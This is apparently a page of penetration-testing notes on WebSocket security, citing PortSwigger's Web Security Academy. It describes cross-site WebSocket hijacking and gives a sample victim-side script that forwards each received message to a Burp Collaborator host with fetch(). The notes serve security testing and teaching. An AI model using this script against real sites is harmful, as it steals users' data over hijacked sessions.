WebSockets

WebSocket is a computer communications protocol, providing full-duplex communication channels over a single TCP connection. The WebSocket protocol was standardized by the IETF as RFC 6455 in 2011. The current API specification allowing web applications to use this protocol is known as WebSockets.
-- Wikipedia

PortSwigger - Web Security Academy - Testing for WebSockets security vulnerabilities

Vulnerabilities

Generally any web security vulnerability may also arise using WebSockets.

Cross-site WebSocket hijacking (CSWSH)

Check if the WebSocket handshake is protected against CSRF
Hijack the socket by targeting a victim with something like the following script:

<script>
    var ws = new WebSocket('vulnerable-website.com/websocket');
    ws.onopen = function() {
    	// Send some stuff if needed
        ws.send("READY");
    };
    ws.onmessage = function(event) {
    	// Receive data and send it to "us"
        fetch('xyz.burpcollaborator.com', { method: 'POST', mode: 'no-cors', body: event.data });
    };
</script>

PortSwigger - Web Security Academy - Cross-site WebSocket hijacking

PreviousDOM-based NextWeb cache poisoning

Last updated 2 years ago